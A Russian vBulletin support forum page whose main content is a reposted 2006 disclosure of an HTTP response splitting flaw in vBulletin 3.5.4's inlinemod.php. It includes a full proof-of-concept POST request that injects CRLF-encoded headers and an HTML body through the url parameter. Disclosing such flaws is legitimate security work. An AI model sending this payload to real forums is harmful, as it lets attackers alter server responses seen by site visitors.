VBsupport перешел с домена .ORG на родной .RU
Ура!
Пожалуйста, обновите свои закладки - VBsupport.ru
Блок РКН снят, форум доступен на всей территории России, включая новые терртории, без VPN
На форуме введена премодерация ВСЕХ новых пользователей
Почта с временных сервисов, типа mailinator.com, gawab.com и/или прочих, которые предоставляют временный почтовый ящик без регистрации и/или почтовый ящик для рассылки спама, отслеживается и блокируется, а так же заносится в спам-блок форума, аккаунты удаляются
Если вы хотите приобрести какой то скрипт/продукт/хак из каталогов перечисленных ниже: Каталог модулей/хаков
Ещё раз обращаем Ваше внимание: всё, что Вы скачиваете и устанавливаете на свой форум, Вы устанавливаете исключительно на свой страх и риск.
Сообщество vBSupport'а физически не в состоянии проверять все стили, хаки и нули, выкладываемые пользователями.
Помните: безопасность Вашего проекта - Ваша забота. Убедительная просьба: при обнаружении уязвимостей или сомнительных кодов обязательно отписывайтесь в теме хака/стиля
Спасибо за понимание
From: Агиевич Игорь aka Shanker <shanker_(at)_mail.ru>
Date: 01.05.2006
Subject: vBulletin v3.5.4: HTTP Response Splitting
Здравствуйте, vuln.
Уязвимость в параметре url скрипта inlinemod.php при POST-запросе:
зарегистрированный пользователь может редактировать http-ответ.
ПРИМЕР:
POST /vb354/inlinemod.php HTTP/1.0
Cookie: bbpassword=a5c3d9e61bcb8dea99105143c772bcd9; bbuserid=1
Content-Length: 93
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
Host: www.vulnerable.com
Content-Type: application/x-www-form-urlencoded
do=clearthread&url=lala2%0d%0aContent-Length:
%2033%0d%0a%0d%0a<html>Hacked!</html>%0d%
0a%0d%0a
Уязвимость обнаружена в vBulletin v3.5.4
Версия 3.0.9 не содержит скрипта inlinemod.php и поэтому не уязвима
------------------------------------------------------------------
С уважением,
Агиевич Игорь aka Shanker mailto:shanker@mail.ru
дырка в 3.5.4
